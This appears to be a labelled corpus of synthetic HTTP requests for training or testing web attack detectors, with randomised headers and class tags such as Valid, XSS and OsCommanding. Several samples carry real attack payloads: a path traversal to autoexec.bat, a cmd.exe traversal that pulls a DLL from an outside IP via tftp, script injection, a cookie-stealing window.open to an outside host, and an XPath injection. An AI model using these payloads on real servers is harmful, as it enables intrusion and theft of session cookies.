If-Modified-Since: Fri, 27 Apr 07 11:51:42 UTC
If-Unmodified-Since: Tue, 01 Aug 06 09:14:29 UTC
If-Match: *
If-None-Match: *
If-Range: "8KyAV6dVGetY8pC7-"
Max-Forwards: 4
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: Digest nc=3bDFFDbF
Range: 73855-,-7357
Referer: /0irmtg3/a9eelg/n8fe4na/dseeapy/h3be.bin
TE: gzip;q=0.9,trailers,gzip;q=0.1
Trailer: Range
User-Agent: akeEisGw7murj
UA-CPU: PowerPC
UA-Disp: 9450,977,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8734x738
Via: 0.2 www.brsi.png, FTP/3.3 150.149.82.74, 8.2 www.nnwz1.js
Transfer-Encoding: deflate
Upgrade: ret/6.5, tph/9.9, eiMan/0.4, qEir/6.9, 0be/8.7
Warning: 570 www.aeie.jpeg "o8tLYeamua7c0s" 
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16772
Start - Id: 45540
class: PathTransversal
GET /h7SllVECRpd5qK4/iauaslRodflnnir/ar9bidrvnjnErnea7/tilyXxV3ScHboP6R3Orf/esegFmbncxi/wSnDuys1sD5jstsb/rast/i3C75zZ_PR/lpYZn_.gif?naedtr1eeyig=2334&bebwMtieoh3ezrn=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&3gtaeRsdunb=enAte&NsfeaviMate=sphS&CbgsoundD9imgnHw=atmTtteorunhsjjye&ua1trovnoeiiBi=Mcbiy&etteheibeek=eRiaL&vrhlt0=ef&ZbincytmpMk=4kbFt&fh8t=eVij9otl HTTP/1.0
Host: www.cbnehaAiN.org:3
Connection: otsE
Accept: text/xml;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 8i-tHthrt;q=0.3, gneqnqp-rsqeo
Cache-Control: only-if-cached
Client-ip: 189.238.147.1
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="20"
Date: Thu, 14 Apr 05 22:52:17 CET
ETag: "_4i.sK62g09@pXchU"
Expect: risLed=ttyu;ktgn0r8=sEtyhds
From: muibee@Egtuem.uk
If-Modified-Since: Sat, 29 Oct 05 24:01:28 UTC
If-Unmodified-Since: Sun, 04 Sep 05 08:38:05 UTC
If-Match: "Ei-1w8cESN8ZjMTSry"
If-None-Match: "S@3pqppy8N3ysEXy1"
If-Range: Thu, 01 Apr 04 16:49:45 UTC
Max-Forwards: 8726
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: 5Lsdai shnsRyd=i8hqCn
Range: 903-3,3-4324,-8
Referer: /lgmhseeT/4lqnI.pdf
TE: trailers
Trailer: Accept-Language
User-Agent: a12oatGyoWd
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 589x0586
Via: 2.3 www.rtlprP.jpeg, 0.5 www.ipaEwi.js:725, aad/5.3 19.74.213.23
Transfer-Encoding: deflate
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 195.59.106.169
X-Serial-Number: 2215888867609
----: -------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45540
Start - Id: 43844
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.tfmlutidza.com
Connection: sebl
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: a-trtil4;q=0.0, eeE-ioi;q=0.2
Cache-Control: no-transform
Client-ip: 86.68.233.225
Cookie: OePic0aui=dzotn;1FsK770kI4s=waoouansHm;icD9iml=tQy0-Fh;Lnull@5Bmk1netcatG=cstewetStiinph-ims;SFss2=)xaperl~dodre~Z1
Cookie2: $Version="07"
Date: Thu, 05 Nov 09 14:02:51 UTC
ETag: W/"mBNr4uKR@28Nw127ZHvC"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Fri, 19 Jun 09 13:22:59 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "4aznkDP7@VmRHPmAkqYx"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 91
MIME-Version: 1.9
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Basic bEx1ZWN0TjpudGFsZQ==
Authorization: NTLM b25hb2t0Z2kxaGVlZXlvbHRpdXBrZGRqaHkwTjBkdGVvZQ==
Range: 064373-124259,214-265,801-679
Referer: http://sa6r6.gov/hpx7EsOf/sAekian/eneay4E/ntzfbyfp.shtml
TE: trailers
Trailer: Accept
User-Agent: a5ndui/9.0.2
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: FTP/4.8 www.hAhbihn6.jpg, FTP/8.9 www.dErseaoi.gif, 7.1 www.akdpg.htm
Transfer-Encoding: IaUt
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43844
Start - Id: 1350
class: Valid
GET /e7AY1fyN7pSttkw.asmx? HTTP/1.1
Host: 60.127.133.113
Connection: o3cot46a
Accept: */*;q=0.2
Accept-Charset: iso-8859-3;q=0.7, x-mac-turkish;q=0.9, windows-1250, iso-2022-kr;q=0.2
Accept-Encoding: *
Accept-Language: yr-anTLb3t, lshiere-tU;q=0.0
Cache-Control: min-fresh=895
Client-ip: 71.250.186.224
Cookie: BHf@MkClNY=nce;tnsd=Rcof;jpamgdeau2t0nek=liball6linkawo'r2ete;afdr9ieyi=rRowgeth ;xt0e4i=Ae
Cookie2: $Version="315"
Date: Thu, 08 Sep 05 06:35:50 UTC
ETag: W/"-J00YEnnw5DfO@N"
Expect: rajicDn
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Fri, 02 Jul 04 22:33:46 UTC
If-Unmodified-Since: Sun, 26 Aug 07 05:11:36 UTC
If-Match: *
If-None-Match: "zTOXAZ-9jmfdTHeO"
If-Range: "765jzxf0UNIMHSwdWA9"
Max-Forwards: 560
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM b2l0YXRuTnQ1eWVleWVTN3RyekVlZGh5b2UxM3Rhd0Fy
Authorization: NTLM U05oYWluRW5lcXlta1NhaXVlNGFlSXJuaGwyRG9hZ2lzcnRyb29mamVu
Range: 518-86,86-,865-
Referer: http://utaUa.cz/etpssppn/Arl8re20.tiff
TE: deflate,chunked;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/0.4 (Windows; U; Win98 9.9; aw-mo; rv:1.8.1) Gecko/42905131
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 290x591
Via: FTP/0.6 www.mlhrl.jpeg
Transfer-Encoding: deflate
Upgrade: yans3i/2.5
Warning: 373 www.2zTns2mm.tiff "ero9leMeia" 
X-Forwarded-For: 185.64.155.53
X-Serial-Number: 814700
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 1350
Start - Id: 48268
class: XSS
PUT /tUsE/deu0/1hncdIserqairhnolr/eWtkjEst/jLZ2D/3system/ototEeBs74srjAteanlb.js? HTTP/1.1
Content-Length: 263
Content-Language: oniltldo,ehep31tn
Content-Encoding: identity
Content-Location: /izoRl1in/etcaJei/nu5e/5ssip1a.cfm
Content-MD5: c09paWFhdW4zYmVzbjR2bg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Mar 07 02:01:00 GMT
Last-Modified: Wed, 23 May 07 03:59:08 GMT
Host: 52.61.66.90
Connection: orfi
Accept: */*;q=0.8
Accept-Charset: iso-8859-6, iso-8859-3, utf-8, koi8;q=0.1
Accept-Encoding: gzip;q=0.7, compress, compress, deflate
Accept-Language: *;q=0.8
Cache-Control: max-age=92
Client-ip: 211.13.238.111
Cookie: tXihhPcKZ@=ordA;qpyseucr=eEIttMd@EZ;f6icat6=[\xC0][\xBC]script>[alert    ('awLaew1');][\xC0][\xBC]/script    >;shaeoqbtr=deniniernri9ahdssa;d1i0deglb2Ssi=Y unLr4eselecth2e
Cookie2: $Version="70"
Date: Thu, 02 Mar 06 05:55:21 GMT
ETag: W/"Njnh-vLd42p_SsCtNRo"
Expect: 36ow
From: auahg@3jfcevEe.net
If-Modified-Since: Sun, 15 Jul 07 04:05:39 CET
If-Unmodified-Since: Fri, 23 Jan 09 13:31:31 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Sep 06 10:46:27 CET
Max-Forwards: 9619
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic aGV5NXNpOnNLb28=
Authorization: NTLM YWRveEZVQWNvb3JzdEV0YXlkZTlhZjJoZXZ0bnRlZDBlbHNsaWFmZ3pHT3NzbA==
Range: 4495-934,2-3914
Referer: /gttsnef/hcre/gnlmelr/acfjypm/Bgott.mspx
TE: gzip,gzip
Trailer: Proxy-Authorization
User-Agent: hz.F5T http://www.ernh.net
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 9755x524
Via: 0.2 www.smdear.jpeg, 2.3 204.17.98.110
Transfer-Encoding: deflate
Upgrade: cwO/8.6, ndxoas/3.8
Warning: 206 www.1psi7dr.css "kroeMrnpwdctalj" 
X-Forwarded-For: 133.231.6.91
X-Serial-Number: 96907185083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

c49LA=aseadLqth8oktnt&httpobjectGo5OCx=aNch)&rurtba=seC2cC-5wUb&rdgjonholei=da tt0t&jITPpz5c@glshutdown=ees<iEcatjrEing-&qrdt=aG&6ZRiGL=shgti&ssGfITa5dr0=nlwgetm&.upQK=5o r&IfcUPF8J7_4=iteeh&isaet=r&i&6esder0qtnij=1e@stiInacls&le2rtmyc=o t&UHc-N0EPBo6=cbn

End - Id: 48268
Start - Id: 24468
class: Valid
GET /GOudfm/ax7XEtg/iCsstesdwdrpsTOsU1ss.php?vafbiLOe=%24n8e&ehait=7.s9IH&a2csCE5=2ftrq%40f&.Oklib@b-PA=tf&egsaocoistta4ei=2lpasswdW&hehhxp9thmEo=h&Al4enc4awetor=a%5Dnaht2sn&0dfJ0wKbgsoundL9=0raccess_log HTTP/1.1
Host: www.pophji12h.com
Connection: etOgft
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 16.7.220.177
Cookie: Uyio=ng5cid0d;crnaloaoatn2=nfsehEN=itm&samnab;fzk=89569728;u1N4tR4hcopyja=uSKmTSB@R
Cookie2: $Version="99"
Date: Sat, 01 Oct 05 05:57:18 UTC
ETag: "H6ltNLfjc2qHi7a_G"
Expect: 100-continue
From: dhthnl@6nYTwqee3.com
If-Modified-Since: Fri, 24 Nov 06 10:50:47 GMT
If-Unmodified-Since: Sat, 13 Sep 08 17:37:57 GMT
If-Match: "gLHWWVmGIMsXndL"
If-None-Match: *
If-Range: "BsvS6SECaSeWyv4GUM"
Max-Forwards: 300
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="lcmmeain"
Authorization: Basic d2llanBpZTpPcW5sZQ==
Range: 10-87
Referer: /ldh0d/mcessw.tiff
TE: chunked;q=0.6,chunked,chunked
Trailer: Cache-Control
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 6.0; ss-90; rv:0.8.7) Gecko/53323757
UA-CPU: Sparc
UA-Disp: 200,0703,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 302x1499
Via: 1.3 16.253.236.173
Transfer-Encoding: compress
Upgrade: lasrtg/5.7, oHoa/6.0, aesd/7.3, n4ntab/0.7, RzMo/2.6
Warning: 856 www.1lecdi.htm "2uodsoyot" 
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 280722107
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24468
Start - Id: 47407
class: XSS
GET /edrxUvE/os@@4-eermK/rPyIfOYiuXgWujQm2JVH/tMq4ZO8MPy8xt.png?Eaccess_logb3bl=iXPKnE&Oscript5whereOLzf=wtzreaechoepk&nwbpieVedfuooe=rblhdeaIdieteXB9o5&tDVWJB.dX7=%3Cstyle++type+++%3D+%22+++++text%2Fjavascript+++++%22+%3E%5Bwindow.open%28%27http%3A%2F%2F111.85.196.114%2Friasch.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle%3E&xtermk-2nL-H=48&hn3s9execIeK=eciEgn3tnqbelhugnm&onktr4r=eudDhtobjectLsbo%40o&Uwsqmx2rtoqM=Soat&s7sreiaa=ec5Wjo&WGklinkGRNCc=e+a+&gatxohrdsiG=%7C%3Fot0mnde HTTP/1.0
Host: 176.178.31.130
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.8, x-mac-hebrew, x-mac-cyrillic;q=0.8, euc-kr, windows-1254;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.119.135.49
Cookie: ndecr9mjemjoSe=lJm;h7zonpTbiIxhioo=vs;stsiET1zr=oltk;g7qiNen2nw5=& g9y;eiepnleohholb=1013683;jri0ptloTo=de4@.gPQs.
Cookie2: $Version="093"
Date: Fri, 08 Jun 07 04:30:14 UTC
ETag: "QC@xK6DAF--MsECTF3G"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 29 May 05 04:25:00 GMT
If-Unmodified-Since: Wed, 18 Jul 07 07:02:00 UTC
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: Thu, 05 Nov 09 09:35:14 GMT
Max-Forwards: 9688
MIME-Version: 0.3
Pragma: tziO=et
Proxy-Authorization: Basic ZW5jU3JiaTpwQWFvcmU=
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 2506-,-467
Referer: /etonhtf9.shtml
TE: trailers
Trailer: If-Match
User-Agent: ohaoqtdSsh/4.7.7
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: 2.8 www.wrdnet1.png, 4.8 77.180.56.88
Transfer-Encoding: identity
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 308623860722322067
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 47407
Start - Id: 19313
class: Valid
GET /PY/unt/w30GCSQSB.jpeg? HTTP/1.0
Host: www.oeneit.it
Connection: close
Accept: application/x-tar, text/*;q=0.4, video/*;q=0.8
Accept-Charset: shift_jis
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=74347
Client-ip: 190.169.122.109
Cookie: fokfyzig=95449048;goRoa2=4369759;c-hh.aSC4W2=e 0s;ha=Kpsltt
Cookie2: $Version="298"
Date: Tue, 13 May 08 04:25:53 GMT
ETag: W/"ugn7N9MBSBO5p9A"
Expect: kodhya=rrn5e5w;lceinc5I
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 14 Aug 07 17:33:13 UTC
If-Unmodified-Since: Tue, 07 Jun 05 01:32:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 294
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic aW9EbTNpMjp0cnVwZQ==
Authorization: Basic YmFPRXBpZTplamkzRA==
Range: 920-9201,-4,-23
Referer: /nd5at/a4Iikif/zhan.php
TE: gzip;q=0.2,trailers,trailers
Trailer: Upgrade
User-Agent: u4zotvle (3ctWnN; iF0Nm2x)
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x7421
Via: HTTP/2.8 21.218.194.4
Transfer-Encoding: deflate
Upgrade: sahcq/0.1
Warning: 003 128.98.138.220 "3eksueehheofe0cf" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19313
Start - Id: 32302
class: Valid
GET /avatq3aauD1_RLeOP0/55Mz2d/ee/t7qn1/4nzeas/ndcrhmurtt/mc3XJv/tv/NvJB8-Bq7t9admin/EnHJNechoM7_Z2MU/eenljtocN8e4/mOli6Iwoeka.php?heoecnti=neeljietz+l%5B6i%2B&smGmail-=33715&sr4akFhj55Tni0=lv%40mL9tML8&cnGaro8r4t=57100105&CaGwvCWB0df0=T7eg%3B&ao4sb=1913455&7iq3=2261541 HTTP/1.1
Host: 225.69.26.16
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.6, x-mac-ce;q=0.0, euc-cn, x-mac-roman;q=0.2, euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: reweNx-rtdo;q=0.1
Cache-Control: no-store
Client-ip: 79.52.118.230
Cookie: dDotrxetedosE=363201375;izoh=28043;xQmochabD9PPQMH=63;aTIrnHinCoh=th;8execQm= nnrhMoHy
Cookie2: $Version="501"
Date: Mon, 07 Feb 05 15:52:20 GMT
ETag: W/"PwGVrzKVjv.b6qx3Q"
Expect: 3zih
From: dyhd@dppe.gov
If-Modified-Since: Sun, 11 Nov 07 14:06:36 CET
If-Unmodified-Since: Wed, 29 Dec 04 17:10:31 CET
If-Match: *
If-None-Match: "fAzmc2BLJnTDXHK"
If-Range: Wed, 23 Mar 05 05:26:31 UTC
Max-Forwards: 7
MIME-Version: 9.5
Pragma: mp0i='hcr2'
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: Basic b3BteWl5OmF0RTF0ZmV6
Range: 03424-,9-
Referer: http://Ne7aIa.gov/nw4ksvF/als2r/spie0oo/slu7.asmx
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: i0Nsetmzsn/5.8.6
UA-CPU: PowerPC
UA-Disp: 096,809,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3225x292
Via: 7.1 255.4.106.54, HTTP/6.3 243.104.204.17
Transfer-Encoding: deflate
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 144 36.5.81.66 "nisieeaPsv62Lonttai" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 298337
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32302
Start - Id: 48301
class: XPathInjection
GET /O-mJKvv/c_d8gLhQtCOIWcd1/s1dweWrn/EV82BGfdocumentnXt/cyq@@T8pLWmX/Moay07hsleapnteiroe/lJ/eQio/Qirradea.js?s5blOiffnctare2=3826912&aeGgeaa=q0siHiL&rzkkehftE=15052281&nnoein=enninoaF%2B%5Crun&rTd2nB=4356768687&Tqstdyiumt=hconnect&Nvhtthi=%3Bclctgspoexmlhe%5Dwreplace&hluc=tttsnQ&rl7i=tisnull&dboa8=63649&oaUnjIalt3b=3780&M7=ws%29 HTTP/1.0
Host: 147.73.168.21
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, isiri-3342;q=0.1, euc-cn, x-mac-chinesesimp, cp-936
Accept-Encoding: *;q=0.1
Accept-Language: toymnNh1-ohsah;q=0.3
Cache-Control: max-stale=765
Client-ip: 117.94.16.119
Cookie: u8Ldfan=5ewiq;hEmsdtn6=eoMTT1;0twwsnduep=42690;r5oblheoasf=v7b
Cookie2: $Version="81"
Date: Sat, 23 May 09 20:47:00 CET
ETag: "eerlUYtS7n--gSm11ozn"
Expect: snoiTjo1=irrdax
From: mSrf3p@empeero.de
If-Modified-Since: Mon, 27 Nov 06 16:52:49 GMT
If-Unmodified-Since: Sun, 28 Dec 08 18:19:05 GMT
If-Match: "xMSLdiGN1HBB@LG@_"
If-None-Match: "8McCqQlFVeqvXeaS.n"
If-Range: Mon, 01 Aug 05 15:33:20 GMT
Max-Forwards: 26
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: l3mee aaieteal=Eacttno
Referer: http://Jtbrr.net/20etl/tdqEt.swf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 185    or 1<    hfrewg/etut/ja0esW/child::text()[position()=5]     or   97='] | /* | /foo[bar='
UA-Disp: 161,1188,16
UA-Pixels: 433x249
Via: 3.3 96.89.107.227
Transfer-Encoding: nisig
Upgrade: e0ePs/3.7, eids5/6.0, aacr/1.5, dsm/2.6, Stu/3.2
Warning: 302 12.139.124.62 "qfuhcmikee7d" 
X-Forwarded-For: 145.155.0.124
X-Serial-Number: 280773843
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48301
Start - Id: 12904
class: Valid
GET /bghrholaeemib/spYppaenashohclome/4EvZ2Q/TOmfars6stoktitm/gEUC8imzHdcZocUmt.sh?uHZu8=sock_streamLLniq4i%5Cr HTTP/1.0
Host: www.jgnomLzaE.biz
Connection: xpopra4e
Accept: video/mpeg;q=0.9, image/*
Accept-Charset: us-ascii;q=0.9, iso-8859-9;q=0.0, x-mac-japanese;q=0.5
Accept-Encoding: gzip, deflate;q=0.0, deflate;q=0.5
Accept-Language: 6l-P0;q=0.6, tsert-b, zi-P4Ei6h3z;q=0.4
Cache-Control: only-if-cached
Client-ip: 236.220.231.27
Cookie: tt1TeeauedhnM=323
Cookie2: $Version="03"
Date: Mon, 04 Sep 06 06:15:17 GMT
ETag: "_sbhlPYinSmBJN-h8KGx"
Expect: 100-continue
From: scYeU@sc8oil.it
If-Modified-Since: Sat, 28 Mar 09 06:48:30 CET
If-Unmodified-Since: Sun, 11 Jan 04 18:46:19 GMT
If-Match: "fwpuujqYAAv798QWe"
If-None-Match: "1J0X7TlS9FF3mqtMVw"
If-Range: *
Max-Forwards: 0491
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM bzZPZ2JsbmFleXRTbnR5eHJkc2FhaWlzczJudDduczdhaXNtdG5oYWU=
Authorization: mttne evieno9m=opttCr
Range: 976-,-97584
Referer: http://hWwer.st/ie0E/iipt/yeli/saansna.dll
TE: trailers
Trailer: Range
User-Agent: Mozilla/4.6 (X11; U; SunOS sun4u 8.6; ra-ee; rv:6.8.2) Gecko/48987648
UA-CPU: StrongARM
UA-Disp: 769,338,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 253x5878
Via: rrStan/3.4 www.diOn4.htm, ntoo/3.1 10.64.164.73, 9.3 252.225.150.201
Transfer-Encoding: 6dcNaa; ue2hshh=rebim9t5
Upgrade: ioeah/7.8, nuq/3.5, nnm/0.8
Warning: 015 www.ar8u.js "senI" "Thu, 29 May 08 05:12:05 GMT"
X-Forwarded-For: 85.130.149.249
X-Serial-Number: 194126085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12904
Start - Id: 17749
class: Valid
GET /sp6mlsujsepvcns/@7/gizOJa-54eM/dcar1reJeugeszt/eCyfJBal7gOemNpU/olEg..asmx?vNoPo=8E%40&oqbt7en7re=nrdn5R2ohg&nnihaRio=orsggt&O8homeildXF=getNssamtHi HTTP/1.1
Host: 222.137.174.32
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: gzip, identity, compress;q=0.0, deflate;q=0.9
Accept-Language: hOTMlaT-r;q=0.9, dpdw-0luoelr;q=0.5, gJnf-iaoeef, vo-r, uhmO-fomDr;q=0.9
Cache-Control: no-cache
Client-ip: 66.109.210.39
Cookie: tth5es=nh;baep=tCS
Cookie2: $Version="25"
Date: Fri, 17 Sep 04 07:56:36 CET
ETag: "_Vf8u6CyvgISt7wcmdD."
Expect: tw9e=ryhioopr;oi6mmei
From: n9er28tn@o65oN.ch
If-Modified-Since: Thu, 23 Feb 06 09:54:57 CET
If-Unmodified-Since: Thu, 04 Mar 10 01:30:12 GMT
If-Match: *
If-None-Match: "Mw6SJIQj_b4h@WlR0z"
If-Range: Tue, 28 Nov 06 15:33:15 GMT
Max-Forwards: 7796
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: e0oRa tfteee2r=zedmvhE
Range: 012393-4,26670-6749
Referer: http://ossc2.be/eawot/osc9te/l4ntAm.pdf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: tmTZDmti http://www.ynayf.be
UA-CPU: x86
UA-Disp: 192,3054,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 582x198
Via: 4.1 www.1tOate.shtml
Transfer-Encoding: gzip
Upgrade: ZHn/3.1
Warning: 210 132.96.61.169 "3xerwcr2t" "Thu, 11 Mar 10 21:52:08 GMT"
X-Forwarded-For: 102.74.69.231
X-Serial-Number: 197606037
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 17749
Start - Id: 1099
class: Valid
GET /t5t6ihOcYa.jpeg?ea5ia3ds9ht=yispttm&ZzgQe7Py1Ginput=FOu&gorogi=%2Fi+4e&srisFadHiaeA7cz=6hcRNelHqB&nal=y%3AltdkMlMrrnetcatbdHs8%29&tibrksawehe=883&pocgyLIminuu=s%5Dvara&uieyRiso2a=pgst8eeAkiEt&Tslabe4Epbpnt=47&aefwmelrqe=jatVeoe HTTP/1.1
Host: 180.14.218.140:3
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: e='et'
Client-ip: 44.94.35.250
Cookie: wbnasntrRro=0;Deb=48968395;fireajthhtIg=DorA;s3koatehoU=47034;tmttfld7a=7znuy7aN1Deaaei
Cookie2: $Version="356"
Date: Sun, 06 Feb 05 02:13:27 UTC
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: i7nbBch=r4rzda;rqwr=tMmjzte
From: hsrtboi@onni.cz
If-Modified-Since: Thu, 04 Sep 08 15:03:38 UTC
If-Unmodified-Since: Mon, 26 Sep 05 19:10:21 UTC
If-Match: "y2SRvyTR-AhZzSK8M"
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 9.9
Pragma: o=r
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Digest cnonce="gehETepa"
Range: 634551-,48052-6687,-9
Referer: http://hcl5t.ch/roghTh/Ahtceor6/fHVtnxIT/qbSzs/mustu.mpeg
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.4 (compatible; MSIE 1.2; WinNT; uhss; eateia1; et1fkmnguc)
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8837x3320
Via: HTTP/5.9 www.tofed.shtml, FTP/3.8 www.t3Eeti.html
Transfer-Encoding: i9la3; nkoj=lsosdp
Upgrade: naoiE7/1.4, Zee1m6/8.6, 40Hci1/1.3, 6iCotl/8.9
Warning: 661 137.149.16.237 "feaedroaod" "Sun, 02 Oct 05 18:31:18 UTC"
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1099
Start - Id: 14792
class: Valid
GET /rie/nVTro4Lgq/hYapihurodf1Rno/iDy2SDk76N6VQwC6ii0u/ni4Prfy7hW/access_log2-v/pdeeeasr2/7B.bin?tsSfdwTaEctHan=68&lmeflkisst=dP.00dNiMp&EVhhe91oioosorg=9&RTeWiaeopeemd=22&6euab=6755877&qJv1ohgAalrTsb=cibc7Ld HTTP/1.1
Host: 129.40.128.137
Connection: close
Accept: audio/*;q=0.6, audio/basic;q=0.6, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 104.98.203.85
Cookie: um=rteOt7c;puaeitdeoee=d@EMZ8;mlmseet=njn'd)chez;oxbyG-=t@apescriptd5efintinputautoexecSbs
Cookie2: $Version="870"
Date: Tue, 09 Feb 10 06:01:55 CET
ETag: W/"_8gE6FhqB.1.hyLdc5U"
Expect: 4mihwq=ddtOedow
From: nOeesl@pemet.it
If-Modified-Since: Sat, 28 Oct 06 08:37:37 CET
If-Unmodified-Since: Mon, 01 Jun 09 08:02:14 CET
If-Match: "tbmAW32F47ebW5bn"
If-None-Match: *
If-Range: Wed, 14 Jun 06 03:57:25 UTC
Max-Forwards: 7281
MIME-Version: 1.7
Pragma: t='atce5'
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: Basic TUVIczplclNhc21l
Range: -902734
Referer: http://u1htct.fr/seIu/tep1r/egdrco/nh8o.swf
TE: deflate
Trailer: Transfer-Encoding
User-Agent: lAanu3inta/1.7.0
UA-CPU: Sparc
UA-Disp: 9935,4527,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 997x0767
